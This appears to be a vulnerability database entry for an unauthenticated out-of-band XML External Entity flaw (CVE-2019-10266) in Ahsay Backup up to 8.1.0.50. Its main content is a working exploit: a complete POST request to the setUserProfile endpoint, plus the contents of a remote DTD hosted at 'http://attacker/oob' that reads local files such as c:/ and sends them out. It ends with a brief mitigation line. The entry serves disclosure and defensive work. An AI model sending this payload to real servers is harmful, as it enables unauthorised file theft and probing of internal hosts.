vendor:
Ahsay Backup
by:
Wietse Boonstra
7.5
CVSS
HIGH
XXE
611
CWE
Product Name: Ahsay Backup
Affected Version From: 7.x
Affected Version To: 8.1.0.50
Patch Exists: YES
Related CWE: CVE-2019-10266
CPE: a:ahsay:ahsay_backup:8.1.0.50
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows / Linux
2019
Unauthenticated XML External Entity (XXE) in Ahsay Backup v7.x – v8.1.0.50.
Ahsay is vulnerable to a OOB Unauthenticated XML External Entity. Sending the following POST request will trigger the XXE: POST /obs/obm8/user/setUserProfile HTTP/1.1 Content-Type: application/octet-stream Content-Length: 126 Host: 172.16.238.213:80 <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker/oob"> %remote;%intern; %trick;]> On http://attacker/oob add the following content: <!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY % trick SYSTEM 'file://:%payl;/%payl;'>"> Here it is possible to change file:///c:/ to any directory/file or internal host.
Mitigation:
Ensure that all XML input is validated and filtered for malicious content.